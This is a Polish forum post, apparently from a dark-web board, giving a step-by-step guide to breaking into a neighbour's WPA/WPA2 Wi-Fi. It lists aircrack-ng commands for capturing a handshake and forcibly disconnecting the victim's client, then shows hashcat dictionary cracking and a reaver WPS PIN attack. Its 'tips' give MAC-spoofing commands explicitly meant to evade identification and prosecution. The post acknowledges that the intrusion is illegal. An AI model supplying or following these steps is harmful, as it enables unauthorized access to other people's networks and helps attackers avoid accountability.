Notes

Jako, że sam przez ostatnich kilka dni borykałem się z zabezpieczeniami wifi sąsiada, skakając po clarnetowych tutkach i filmikach, z których rzadko kiedy można było wynieść coś wartościowego, postanowiłem podać wam wszystko na tacy.
Bo po co wyważać już raz wyważone drzwi?!

Skupię się na łamaniu WPA/WPA2 ponieważ sieć WEP idzie złamać w 10 minut korzystając z Google.
Pierwszym naszym zadaniem jest zdobycie handshake'a ofiary. Aby tego dokonać i być z siebie dumnym ściągamy Backtracka i VMware. Można to zrobić również używając programu Commview i być z siebie mniej zadowolonym.
Domyślam się jednak że większość z was na codzień korzysta z Backtracka więc wybierzecie wariant nr 1. Bo tylko ten zamierzam opisać.

Otwieramy konsole i smarujemy.

1. airmong-ng

widzimy swoją kartę, musimy ją zmienić w monitor mode

2. airmong-ng start wlan0

zaczynamy poszukiwania ofiary

3. airodump-ng mon0

gdy pojawia się jakaś ciekawa sieć z dużym sygnałem zatrzymujemy szukanie ctrl+c
wybieramy sieć i kopiujemy BSSID oraz zapisujemy kanał

4. airodump-ng -c -(kanał) -w (nazwa pliku pod którą zostanie zapisany handshake) --bssid (tu wklejamy bssid) mon0

W tym momencie nasluchujemy sieć i czekamy aż między AP a clientem dojdzie do połączenia, czyli tak naprawde możemy się nie doczekać. I właśnie w tym momencie przedstawiana przeze mnie metoda góruje nad metodą w której wykorzystywany jest skrypt wifite, ponieważ za chwile sami rozłączymy sąsiadowi pornolka.

5. Otwieramy konsole and type it:

aireplay-ng -0 5 -a (bssid) mon0

Następuje 5 prób rozłączenia a po nich na poprzednim okienku w prawym górnym rogu powinna pojawić sie notka o handshake'u.

Ja w tym momęcie ucałowałem BT i wróciłem razem z HS'em do Windowsa.
Kolega sajg0n w swoim tutorialu wspomniał już o zacnym software jakim jest HashcCat, zatem właśnie jego użyjemy w dalszym kroku.

Ściągamy wersję GUI oraz oclHashcat-plus. oclHashcat-plus wrzucamy do folderu HashCat gui zamiast starego oclHashcat-plus.
Odpalamy program i wybieramy hardware którego chcemy użyć do łamania hasła. Wiadomo, kto ma dobrą grafikę ten pojedzie szybciej. Dla porównania szybkość łamana w moim
przypadku na CPU to 400 haseł/seka GPU już 4800/sek.

Zanim wrzucimy nasz HS musimy go przekonwertować z .cap na .hccap
Zrobimy to tu : https://hashcat.net/cap2hccap/.
Wbijaj na 2 zakładke wrzuć świerzutki plik .hccap wybierz słowniki dodając je w drugim oknie ( nie chce mi się o nich póki co pisać, zapraszam do kolegi sajg0n które ładnie
je opisał http://polish7zujaftc2q.onion/viewtopic.php?id=113 )
Wybieramy z rozwijanej listy Hashtype WPA/WPA2 i odpalamy konsolkę.
Jeżeli nam się poszczęści i szukane hasło znajduje się w słowniku kotek nam go wyjawi.

Uwaga! Jeżeli nie dysponujesz żadną grafiką, albo porządnymi słownikami możesz skorzystać z pokrewnej duszy i użyć jej koparki do bit coinsów.

Jeżeli znalazłeś błąd lub coś jest niezrozumiałe pisz. Jak mi się zechce uzupełnie go o pozostałe metody.

Dział download:
Backtrack
http://www.backtrack-linux.org/downloads/
VMware
http://www.dobreprogramy.pl/VMware-Workstation,Program,Windows,13322.html
HashCat
http://hashcat.net/hashcat-gui/


Dodaj link do koleżki który łamie hasełka: http://www.skidhacker.com/wpacrack jest tam na liście nawet kilku rodaków. Warto jednak samemu próbować,
mi się udało przy trzecim słowniku.

Oczywiście aby przechwycić handshake potrzebujemy karty kompatybilnej z Backtrackiem.
Ja użyłem anteny aktywnej WIFI SKY poza tym że sterczy za oknem jak chuj o poranku to jest zajebista.



Kilka tips&tricks dla uzupelnienia moge dorzucic

Zawsze, ale to zawsze zmniej adres MAC. Dla dodatkowego bezpieczenstwa mozna zakupic zewnetrzna karte sieciowa i uzywac jej tylko do wyznaczonych dzialan.

Jak zmienic adres MAC ?

METODA EASY

1. Jak nie masz to pobierasz macchanger

apt-get install macchanger

2. Wklepujesz w kolejnosci

sudo ifconfig wlan0 (Twoja nazwa) down
sudo macchanger -A (Random adres) wlan0
sudo ifconfig wlan0 up

METODA BEZ MACCHANGER (jak ktos chce?)

sudo ifconfig wlan0 down
sudo ifconfig hw ether 00:01:02:03:AA:BB
sudo ifconfig wlan0 up

Kiedy zmieniac ?

Nie wtedy kiedy korzytasz z domowego lacza to chyba oczywiste. Nie wtedy kiedy korzystasz z sieci typu biblioteka (nie swoj PC). Zmieniac tylko kiedy korzystacie ze swojego urzadzenia na obcej sieci, obojetne czy open/cracked.

Czemu ?

A no bo, nic z tego, ze maja wasz adres MAC - fakt. Co prawda moga poszukac po producencie i jesli kupiliscie komputer na swoje nazwisko to game over, ale to raczej malo prawdopodobne. Trzeba jednak zmieniac gdyz w razie wpadki to moze byc pierwszy i ostatni dowod potrzebny, aby umilic wam zycie w zakladzie zamknietym (tak, lamanie sieci to w Polsce rowniez karane przestepstwo - co ciekawe - podlaczanie sie do niezabezpieczonej, juz niekoniecznie)

Lamanie WPA metoda druga - Reaver

Reaver to maly programik zainstalowany defalutowo w BT i Kalim. Dosc przydatny jesli masz czas (od 1h do w niektorych przypadkach kilku dni). Bedzie on wyciagal WPS pin zatem konieczne jest, aby na AP na ktory wbijacie bylo to wlaczone. Sama obsluga reaver to banal (bez dodatkowych opcji ktorymi warto sie pobawic). Tak wiec.

1. Tworzysz tak samo tryb monitor na karcie i dostosowujesz sie do tutorialu wyzej

2. AP musi miec wlaczony WPS. Jak to sprawdzic ?


wash -i mon0

Jesli pokazuje

WPS Locked : No

- kontynuuj

reaver -i mon0 -c [numer kanalu] -b [bssid] -vv

Reaver ma sporo opcji, ktore moga pomoc w ataku. Sprawdz sam.

reaver --help


Osobiscie raczej nie dbam o WPA. Duzo zachodu. O WEP i Open wbrew pozorom nie jest bardzo trudno. I nie, nie kazdy to honeypot.

karty działające na linuxie niżej jest lista
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=7614ab33970d8a14f090e91cffec7ff2#compatibility